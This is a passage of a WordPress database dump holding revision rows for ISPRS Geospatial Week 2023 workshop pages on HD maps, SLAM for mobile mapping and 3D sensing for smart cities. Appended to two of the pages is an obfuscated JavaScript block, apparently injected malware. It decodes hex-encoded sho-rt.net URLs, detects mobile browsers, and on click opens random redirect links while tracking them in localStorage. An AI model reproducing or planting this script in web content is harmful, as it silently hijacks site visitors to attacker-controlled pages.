_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','MMT and HD Maps - Mobile Mapping Technologies and HD Maps','','inherit','closed','closed','','2095-revision-v1','','','2023-02-05 10:59:16','2023-02-05 10:59:16','',2095,'https://gsw2023.com/?p=3805',0,'revision','',0),
(3806,1,'2023-02-05 11:03:42','2023-02-05 11:03:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence</span></strong></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied environments, just to mention a few. The recent development of effective artificial intelligence tools also plays a core role in these applications, in order to enable an effective machine interpretation and understanding of geospatial data.</h5>\n<h5 style=\"text-align: justify; color: black;\">The previously mentioned applications are usually related to the use of mobile platforms working in real time: these requirements imply the use of effective mobile mapping systems. Furthermore, the need for ubiquitous accurate localization goes beyond the possibilities of stand-alone GNSS positioning. In this context, simultaneous mapping and localization (SLAM) techniques have proved to be effective solutions in order to properly compensate for the unreliability of GNSS in certain working conditions, while preserving the possibility of fast accurate mapping.</h5>\n<h5 style=\"text-align: justify; color: black;\">Motivated by the above considerations, this workshop will seek contributions covering advanced topics related to the state of the art and future trends of SLAM approaches for mobile mapping and robot intelligence, focusing both on the mapping and localization problems, and on the artificial intelligence tools needed in order to enable mobile perception and real time machine understanding of geospatial data.</h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h1 style=\"text-align: center;\">CHAIRS</h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"36\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Simultaneous localization and mapping (SLAM) techniques</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic and metric SLAM</strong></h6>\n</li>\n<li>\n<h6><strong>Calibration of mobile (multi) sensor systems</strong></h6>\n</li>\n<li>\n<h6><strong>Evaluation of localization and mapping sensors for indoor and outdoor robotics</strong></h6>\n</li>\n<li>\n<h6><strong>Learning and optimization for robotics multi-sensor integration</strong></h6>\n</li>\n<li>\n<h6><strong>New robotic mapping applications</strong></h6>\n</li>\n<li>\n<h6><strong>Mapping representations for robotics and autonomous vehicle navigation</strong></h6>\n</li>\n<li>\n<h6><strong>Robotic mapping benchmarks</strong></h6>\n</li>\n<li>\n<h6><strong>On-board sensors of autonomous systems for mapping and map updating purposes</strong></h6>\n</li>\n<li>\n<h6><strong>Perception in non-controlled or complex or non-cooperative environments</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial representations, data structures and database technologies for large scale mapping and map updating</strong></h6>\n</li>\n<li>\n<h6><strong>Synergies between indoor mobile mapping and building information modelling (BIM)</strong></h6>\n</li>\n<li>\n<h6><strong>Integration of SLAM with inertial sensors</strong></h6>\n</li>\n<li>\n<h6><strong>Low cost sensors for mapping and localization</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: orange;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Yuan Zhuang, Wuhan University, China</strong></h6>\n</li>\n<li>\n<h6><strong>Vincenzo di Pietra Politecnico di Torino, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Stephan Nebiker, FHNW, Switzerland</strong></h6>\n</li>\n<li>\n<h6><strong>Heikki Hyyti, NLS, Finnland</strong></h6>\n</li>\n<li>\n<h6><strong>Phillipp Fanta-Jende, AIT, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Norbert Haala, University of Stuttgart</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence','','inherit','closed','closed','','2570-revision-v1','','','2023-02-05 11:03:42','2023-02-05 11:03:42','',2570,'https://gsw2023.com/?p=3806',0,'revision','',0),
(3807,1,'2023-02-05 11:07:24','2023-02-05 11:07:24','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2583\" img_size=\"322x196\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>3DS Smart Cities - 3D Sensing for Smart Cities</strong></span></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>High-accuracy and high-efficiency 3D sensing and associated data processing techniques are urgently needed for smart cities. 3D geospatial data acquired by digital photogrammetry and LiDAR systems have become one of the most important data sources to support smart city applications, such as city infrastructure inventory, city planning, urban design, autonomous driving, etc. This workshop will seek contributions covering advanced topics related to the state of the art and future trends of 3D sensing technology and algorithms for smart city applications. Papers addressing the following topics are welcome: photogrammetric mapping, LiDAR point cloud processing, ubiquitous sensing, cross-modality sensing, etc. The workshop will be part of the ISPRS Geospatial Week 2023 hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" 